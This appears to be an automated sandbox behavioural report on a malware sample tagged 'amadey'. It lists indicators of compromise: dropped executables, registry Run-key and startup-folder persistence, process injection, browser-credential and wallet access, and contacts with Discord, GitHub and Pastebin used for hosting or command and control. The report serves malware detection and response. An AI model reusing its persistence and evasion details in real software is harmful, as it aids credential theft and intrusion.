amadey | cf99eaaa334a9c8ffc2fe0e1068ffcc02dda1dd8b2b0eab2821182c5d2c1f51d

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Lu4421.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Lu4421.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
6176	powershell.exe
5156	cmd.exe

Drops startup file 6 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Java Update (32bit).lnk	x.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Java Update (32bit).lnk	x.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Securify360.url	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Securify360.url	cmd.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\new.lnk	new.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\new.lnk	new.exe

Executes dropped EXE 60 IoCs

pid	Process
1204	TPB-1.exe
2376	TestExe.exe
1956	x.exe
2864	PDFReader.exe
3828	stories.exe
1284	stories.tmp
2944	tuneaudiotool32.exe
4760	Amadeus.exe
2148	Loader.exe
3148	KillingInstructional.exe
4020	Paintball.com
4756	system32.exe
1440	system32.exe
5272	Amadeus.exe
5768	fcxcx.exe
5132	Update.exe
6040	4F5E.tmp.ssg.exe
2788	Client-built.exe
6032	Client.exe
5600	6C4F.tmp.zx.exe
1680	6C4F.tmp.zx.exe
6192	main.exe
3896	tmp.exe
6380	main.exe
6196	QuizPokemon.exe
5604	t.exe
3172	sysnldcvmr.exe
6408	Shopzilla.pif
2992	shost.exe
6316	shost.exe
1780	3076928777.exe
6872	Client-built.exe
6736	Amadeus.exe
6188	qhos.exe
2900	qhos.exe
6384	QuizPokemon.exe
6544	Shopzilla.pif
6536	phost.exe
5076	phost.exe
1368	center.exe
6468	in.exe
6492	CenterRun.exe
6660	SeetrolCenter.exe
6292	Shopzilla.pif
6116	rar.exe
6844	BWCStartMSI.exe
5428	BWCStartMSI.exe
6324	downloader.exe
1772	VipToolMeta.exe
4904	new.exe
6552	BingWallpaperApp.exe
5780	Sever Startup.exe
6368	Lu4421.exe
4988	svchost.exe
6872	TrackYourSentOLSetup.exe
2380	shost.exe
6196	shost.exe
6488	SeetrolCenter.exe
4344	Shopzilla.pif
6964	random.exe

Loads dropped DLL 64 IoCs

pid	Process
1284	stories.tmp
2944	tuneaudiotool32.exe
2148	Loader.exe
1440	system32.exe
1440	system32.exe
1440	system32.exe
1440	system32.exe
1440	system32.exe
1440	system32.exe
1440	system32.exe
1440	system32.exe
1440	system32.exe
1440	system32.exe
1440	system32.exe
1440	system32.exe
1440	system32.exe
1440	system32.exe
1440	system32.exe
1440	system32.exe
1440	system32.exe
1440	system32.exe
1440	system32.exe
1440	system32.exe
1440	system32.exe
1440	system32.exe
1440	system32.exe
1440	system32.exe
1440	system32.exe
1440	system32.exe
1440	system32.exe
1440	system32.exe
1440	system32.exe
1440	system32.exe
1440	system32.exe
1440	system32.exe
1440	system32.exe
1440	system32.exe
1440	system32.exe
1440	system32.exe
1440	system32.exe
1440	system32.exe
1440	system32.exe
1440	system32.exe
1440	system32.exe
1440	system32.exe
1440	system32.exe
1440	system32.exe
1440	system32.exe
1440	system32.exe
1440	system32.exe
1440	system32.exe
1440	system32.exe
1440	system32.exe
1440	system32.exe
1440	system32.exe
1440	system32.exe
1440	system32.exe
1440	system32.exe
1440	system32.exe
1440	system32.exe
1440	system32.exe
1440	system32.exe
1680	6C4F.tmp.zx.exe
1680	6C4F.tmp.zx.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 10 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000\Software\Microsoft\Windows\CurrentVersion\Run\BingWallpaperApp = "C:\\Users\\Admin\\AppData\\Local\\Microsoft\\BingWallpaperApp\\BingWallpaperApp.exe"	msiexec.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000\Software\Microsoft\Windows\CurrentVersion\Run\new = "C:\\Users\\Admin\\AppData\\Roaming\\new.exe"	new.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000\Software\Microsoft\Windows\CurrentVersion\Run\Services = "C:\\Users\\Admin\\AppData\\Roaming\\07968106F50A1448456937\\07968106F50A1448456937.exe"	msiexec.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000\Software\Microsoft\Windows\CurrentVersion\Run\Services = "C:\\Users\\Admin\\AppData\\Roaming\\07968106F50A1448456937\\07968106F50A1448456937.exe"	audiodg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Windows\\sysnldcvmr.exe"	t.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	center.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	BWCStartMSI.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000\Software\Microsoft\Windows\CurrentVersion\Run\ElectronArtsCLI = "C:\\Users\\Admin\\Videos\\ElectronArts\\Bin\\ElectronArtsCLI.exe"	PDFReader.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000\Software\Microsoft\Windows\CurrentVersion\Run\empyrean = "C:\\Users\\Admin\\AppData\\Roaming\\empyrean\\run.bat"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000\Software\Microsoft\Windows\CurrentVersion\Run\Services = "C:\\Users\\Admin\\AppData\\Roaming\\07968106F50A1448456937\\07968106F50A1448456937.exe"	Update.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Enumerates connected drives 3 TTPs 46 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 64 IoCs

Web Service

T1102

flow	ioc
48	raw.githubusercontent.com
396	raw.githubusercontent.com
441	discord.com
503	bitbucket.org
499	discord.com
239	discord.com
271	discord.com
442	discord.com
458	discord.com
476	discord.com
497	discord.com
446	discord.com
448	discord.com
262	discord.com
268	discord.com
279	discord.com
392	raw.githubusercontent.com
395	raw.githubusercontent.com
437	discord.com
463	discord.com
247	discord.com
275	discord.com
327	discord.com
455	discord.com
713	raw.githubusercontent.com
188	pastebin.com
444	discord.com
459	discord.com
410	raw.githubusercontent.com
439	discord.com
469	discord.com
2	raw.githubusercontent.com
261	discord.com
264	discord.com
464	discord.com
470	discord.com
25	raw.githubusercontent.com
39	discord.com
456	discord.com
472	discord.com
231	discord.com
241	discord.com
326	raw.githubusercontent.com
412	discord.com
432	discord.com
467	discord.com
465	discord.com
257	discord.com
265	discord.com
272	discord.com
326	discord.com
413	bitbucket.org
461	discord.com
394	raw.githubusercontent.com
402	raw.githubusercontent.com
56	discord.com
213	discord.com
260	discord.com
267	discord.com
274	discord.com
393	raw.githubusercontent.com
475	discord.com
477	discord.com
492	discord.com

Looks up external IP address via web service 12 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
215	api.ipify.org
216	api.ipify.org
324	ip-api.com
10	ip-api.com
39	ipapi.co
53	ipapi.co
55	ipapi.co
309	ip-api.com
413	api.ipify.org
433	api.ipify.org
43	ipapi.co
51	ipapi.co

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Drops file in System32 directory 8 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\GroupPolicy	Shopzilla.pif
File opened for modification	C:\Windows\SysWOW64\GroupPolicy\gpt.ini	Shopzilla.pif
File created	C:\Windows\System32\GroupPolicy\Machine\Registry.pol	Shopzilla.pif
File opened for modification	C:\Windows\System32\GroupPolicy\GPT.INI	Shopzilla.pif
File opened for modification	C:\Windows\System32\GroupPolicy	Shopzilla.pif
File opened for modification	C:\Windows\SysWOW64\GroupPolicy\gpt.ini	Shopzilla.pif
File opened for modification	C:\Windows\System32\GroupPolicy\Machine\Registry.pol	Shopzilla.pif
File opened for modification	C:\Windows\System32\GroupPolicy\GPT.INI	Shopzilla.pif

Enumerates processes with tasklist 1 TTPs 11 IoCs

Process Discovery

T1057

pid	Process
6520	tasklist.exe
6392	tasklist.exe
4320	tasklist.exe
2276	tasklist.exe
5064	tasklist.exe
4824	tasklist.exe
6132	tasklist.exe
3796	tasklist.exe
5876	tasklist.exe
1808	tasklist.exe
4368	tasklist.exe

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

persistence privilege_escalation

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Microsoft\\BingWallpaperApp\\WPImages\\20241214.jpg"	BingWallpaperApp.exe

Suspicious use of SetThreadContext 10 IoCs

description	pid	Process	procid_target
PID 2148 set thread context of 4604	2148	Loader.exe	114
PID 2864 set thread context of 4396	2864	PDFReader.exe	132
PID 4760 set thread context of 4488	4760	Amadeus.exe	134
PID 5272 set thread context of 1348	5272	Amadeus.exe	178
PID 5132 set thread context of 5168	5132	Update.exe	190
PID 5132 set thread context of 5228	5132	Update.exe	191
PID 5132 set thread context of 4356	5132	Update.exe	192
PID 6408 set thread context of 6292	6408	Shopzilla.pif	302
PID 6736 set thread context of 4176	6736	Amadeus.exe	306
PID 6544 set thread context of 4344	6544	Shopzilla.pif	524

UPX packed file 64 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x001900000002abc2-751.dat	upx
behavioral1/memory/1440-755-0x00007FFDFC1E0000-0x00007FFDFC64E000-memory.dmp	upx
behavioral1/files/0x001900000002ab5f-761.dat	upx
behavioral1/files/0x001900000002abb3-763.dat	upx
behavioral1/memory/1440-777-0x00007FFDFC0B0000-0x00007FFDFC16C000-memory.dmp	upx
behavioral1/memory/1440-776-0x00007FFDFC170000-0x00007FFDFC19E000-memory.dmp	upx
behavioral1/memory/1440-775-0x00007FFE14670000-0x00007FFE1467D000-memory.dmp	upx
behavioral1/memory/1440-778-0x00007FFDFC080000-0x00007FFDFC0AB000-memory.dmp	upx
behavioral1/memory/1440-770-0x00007FFE146C0000-0x00007FFE146CD000-memory.dmp	upx
behavioral1/memory/1440-769-0x00007FFE01250000-0x00007FFE01269000-memory.dmp	upx
behavioral1/memory/1440-768-0x00007FFDFC1A0000-0x00007FFDFC1D4000-memory.dmp	upx
behavioral1/memory/1440-767-0x00007FFE01270000-0x00007FFE0129D000-memory.dmp	upx
behavioral1/memory/1440-766-0x00007FFE089F0000-0x00007FFE08A09000-memory.dmp	upx
behavioral1/memory/1440-765-0x00007FFE14770000-0x00007FFE1477F000-memory.dmp	upx
behavioral1/memory/1440-764-0x00007FFE02B90000-0x00007FFE02BB4000-memory.dmp	upx
behavioral1/memory/1440-781-0x00007FFDFC030000-0x00007FFDFC072000-memory.dmp	upx
behavioral1/memory/1440-782-0x00007FFE142D0000-0x00007FFE142DA000-memory.dmp	upx
behavioral1/memory/1440-783-0x00007FFDFBFE0000-0x00007FFDFBFFC000-memory.dmp	upx
behavioral1/memory/1440-784-0x00007FFDFC1E0000-0x00007FFDFC64E000-memory.dmp	upx
behavioral1/memory/1440-787-0x00007FFDFBF60000-0x00007FFDFBF8E000-memory.dmp	upx
behavioral1/memory/1440-786-0x00007FFDFBEA0000-0x00007FFDFBF58000-memory.dmp	upx
behavioral1/memory/1440-785-0x00007FFDFB9E0000-0x00007FFDFBD55000-memory.dmp	upx
behavioral1/memory/1440-788-0x00007FFE02B90000-0x00007FFE02BB4000-memory.dmp	upx
behavioral1/memory/1440-789-0x00007FFDFBE80000-0x00007FFDFBE94000-memory.dmp	upx
behavioral1/memory/1440-792-0x00007FFE141B0000-0x00007FFE141BB000-memory.dmp	upx
behavioral1/memory/1440-794-0x00007FFDFBE30000-0x00007FFDFBE4F000-memory.dmp	upx
behavioral1/memory/1440-793-0x00007FFE01250000-0x00007FFE01269000-memory.dmp	upx
behavioral1/memory/1440-790-0x00007FFDFBE50000-0x00007FFDFBE77000-memory.dmp	upx
behavioral1/memory/1440-791-0x00007FFDFB8C0000-0x00007FFDFB9D8000-memory.dmp	upx
behavioral1/memory/1440-800-0x00007FFE13900000-0x00007FFE1390C000-memory.dmp	upx
behavioral1/memory/1440-803-0x00007FFE100A0000-0x00007FFE100AB000-memory.dmp	upx
behavioral1/memory/1440-809-0x00007FFDFB8A0000-0x00007FFDFB8AB000-memory.dmp	upx
behavioral1/memory/1440-808-0x00007FFDFB8B0000-0x00007FFDFB8BC000-memory.dmp	upx
behavioral1/memory/1440-807-0x00007FFDFBE20000-0x00007FFDFBE2C000-memory.dmp	upx
behavioral1/memory/1440-806-0x00007FFE01240000-0x00007FFE0124E000-memory.dmp	upx
behavioral1/memory/1440-805-0x00007FFE02F80000-0x00007FFE02F8D000-memory.dmp	upx
behavioral1/memory/1440-804-0x00007FFE0D130000-0x00007FFE0D13C000-memory.dmp	upx
behavioral1/memory/1440-802-0x00007FFE11460000-0x00007FFE1146C000-memory.dmp	upx
behavioral1/memory/1440-801-0x00007FFE137B0000-0x00007FFE137BB000-memory.dmp	upx
behavioral1/memory/1440-798-0x00007FFE13C60000-0x00007FFE13C6B000-memory.dmp	upx
behavioral1/memory/1440-824-0x00007FFDFB300000-0x00007FFDFB332000-memory.dmp	upx
behavioral1/memory/1440-829-0x00007FFDFB2B0000-0x00007FFDFB2D9000-memory.dmp	upx
behavioral1/memory/1440-828-0x00007FFDFB4C0000-0x00007FFDFB4CC000-memory.dmp	upx
behavioral1/memory/1440-827-0x00007FFDFB4D0000-0x00007FFDFB4DB000-memory.dmp	upx
behavioral1/memory/1440-826-0x00007FFDFBF60000-0x00007FFDFBF8E000-memory.dmp	upx
behavioral1/memory/1440-825-0x00007FFDFB2E0000-0x00007FFDFB2FE000-memory.dmp	upx
behavioral1/memory/1440-823-0x00007FFDFB340000-0x00007FFDFB351000-memory.dmp	upx
behavioral1/memory/1440-822-0x00007FFDFB360000-0x00007FFDFB3AD000-memory.dmp	upx
behavioral1/memory/1440-821-0x00007FFDFB3B0000-0x00007FFDFB3C8000-memory.dmp	upx
behavioral1/memory/1440-820-0x00007FFDFB3D0000-0x00007FFDFB3EB000-memory.dmp	upx
behavioral1/memory/1440-819-0x00007FFDFB3F0000-0x00007FFDFB412000-memory.dmp	upx
behavioral1/memory/1440-818-0x00007FFDFB420000-0x00007FFDFB434000-memory.dmp	upx
behavioral1/memory/1440-817-0x00007FFDFB440000-0x00007FFDFB450000-memory.dmp	upx
behavioral1/memory/1440-816-0x00007FFDFB450000-0x00007FFDFB465000-memory.dmp	upx
behavioral1/memory/1440-815-0x00007FFDFB470000-0x00007FFDFB47C000-memory.dmp	upx
behavioral1/memory/1440-814-0x00007FFDFB480000-0x00007FFDFB492000-memory.dmp	upx
behavioral1/memory/1440-813-0x00007FFDFB4A0000-0x00007FFDFB4AD000-memory.dmp	upx
behavioral1/memory/1440-812-0x00007FFDFB4B0000-0x00007FFDFB4BC000-memory.dmp	upx
behavioral1/memory/1440-811-0x00007FFDFBEA0000-0x00007FFDFBF58000-memory.dmp	upx
behavioral1/memory/1440-810-0x00007FFDFB9E0000-0x00007FFDFBD55000-memory.dmp	upx
behavioral1/memory/1440-797-0x00007FFDFC0B0000-0x00007FFDFC16C000-memory.dmp	upx
behavioral1/memory/1440-799-0x00007FFE13B50000-0x00007FFE13B5B000-memory.dmp	upx
behavioral1/memory/1440-796-0x00007FFE146C0000-0x00007FFE146CD000-memory.dmp	upx
behavioral1/memory/1440-795-0x00007FFDFB4E0000-0x00007FFDFB651000-memory.dmp	upx

Drops file in Program Files directory 25 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\Google\Chrome\Application\debug.log	chrome.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\123.0.6312.123\debug.log	chrome.exe
File opened for modification	C:\Program Files (x86)\Common Files\Wise Installation Wizard\WISFE9FC5BE5BB6414388F43D74DDB259E8_1_2_0_147.MSI	TrackYourSentOLSetup.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\debug.log	chrome.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\debug.log	chrome.exe
File created	C:\Program Files (x86)\seetrol\client\sas.dll	SeetrolCenter.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\123.0.6312.123\debug.log	chrome.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\123.0.6312.123\debug.log	chrome.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\debug.log	chrome.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\123.0.6312.123\debug.log	chrome.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\123.0.6312.123\debug.log	chrome.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\123.0.6312.123\debug.log	chrome.exe
File created	C:\Program Files (x86)\seetrol\client\SeetrolMyService.exe	SeetrolCenter.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\123.0.6312.123\debug.log	chrome.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\debug.log	chrome.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\debug.log	chrome.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\debug.log	chrome.exe
File created	C:\Program Files (x86)\seetrol\client\Seetrol_Clt.exe	SeetrolCenter.exe
File created	C:\Program Files (x86)\seetrol\client\sthooks.dll	SeetrolCenter.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\debug.log	chrome.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\123.0.6312.123\debug.log	chrome.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\123.0.6312.123\debug.log	chrome.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\debug.log	chrome.exe
File created	C:\Program Files (x86)\Common Files\Wise Installation Wizard\WISFE9FC5BE5BB6414388F43D74DDB259E8_1_2_0_147.MSI	TrackYourSentOLSetup.exe
File created	C:\Program Files (x86)\seetrol\client\SeetrolClient.exe	SeetrolCenter.exe

Drops file in Windows directory 30 IoCs

description	ioc	Process
File opened for modification	C:\Windows\sysnldcvmr.exe	t.exe
File created	C:\Windows\SystemTemp\~DF793DC10DA9572D25.TMP	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIFB6B.tmp-\CustomAction.config	rundll32.exe
File created	C:\Windows\Installer\SourceHash{240D9941-B463-4B9C-B483-7129740B9AC1}	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIFB6B.tmp-\DispatchQueue.dll	rundll32.exe
File created	C:\Windows\SystemTemp\~DFDFB63DB7F55637BF.TMP	msiexec.exe
File opened for modification	C:\Windows\InternshipWant	KillingInstructional.exe
File opened for modification	C:\Windows\GovernmentalPoetry	KillingInstructional.exe
File opened for modification	C:\Windows\Installer\e5af28f.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIF7A1.tmp-\Microsoft.Deployment.WindowsInstaller.dll	rundll32.exe
File opened for modification	C:\Windows\Installer\MSIFB6B.tmp-\CustomActions.dll	rundll32.exe
File opened for modification	C:\Windows\MoBelongs	KillingInstructional.exe
File opened for modification	C:\Windows\Installer\MSIF406.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIF7A1.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIF7A1.tmp-\CustomAction.config	rundll32.exe
File opened for modification	C:\Windows\Installer\MSIFB6B.tmp-\Microsoft.Deployment.WindowsInstaller.dll	rundll32.exe
File opened for modification	C:\Windows\JpegSuse	KillingInstructional.exe
File opened for modification	C:\Windows\Installer\	msiexec.exe
File created	C:\Windows\SystemTemp\~DFE6D59846241A2593.TMP	msiexec.exe
File opened for modification	C:\Windows\SystemTemp	chrome.exe
File created	C:\Windows\Installer\e5af28f.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIFB6B.tmp	msiexec.exe
File created	C:\Windows\SystemTemp\~DF4EF8ECC2C6C84C85.TMP	msiexec.exe
File created	C:\Windows\Installer\inprogressinstallinfo.ipi	msiexec.exe
File created	C:\Windows\Installer\e5af293.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIF7A1.tmp-\CustomActions.dll	rundll32.exe
File opened for modification	C:\Windows\Installer\MSIF7A1.tmp-\DispatchQueue.dll	rundll32.exe
File opened for modification	C:\Windows\JpgCelebrity	KillingInstructional.exe
File created	C:\Windows\sysnldcvmr.exe	t.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log	msiexec.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Command and Scripting Interpreter: JavaScript 1 TTPs
execution

JavaScript
T1059.007

Detects Pyinstaller 5 IoCs

pyinstaller

resource	yara_rule
behavioral1/files/0x001900000002aafb-592.dat	pyinstaller
behavioral1/files/0x001c00000002ac65-1508.dat	pyinstaller
behavioral1/files/0x000700000000f4d3-1857.dat	pyinstaller
behavioral1/files/0x001a00000002ad6f-2773.dat	pyinstaller
behavioral1/files/0x001c00000002ab4f-2985.dat	pyinstaller

Embeds OpenSSL 1 IoCs

Embeds OpenSSL, may be used to circumvent TLS interception.

resource	yara_rule
behavioral1/files/0x001b00000002af06-6192.dat	embeds_openssl

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 12 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

Netsh Helper DLL

T1546.007

description	ioc	Process
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	center.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	in.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Shopzilla.pif
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msiexec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	SeetrolCenter.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BitLockerToGo.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Shopzilla.pif
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BWCStartMSI.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	4363463463464363463463463.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Loader.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Paintball.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BWCStartMSI.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rundll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	SeetrolCenter.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	downloader.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	t.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	stories.tmp
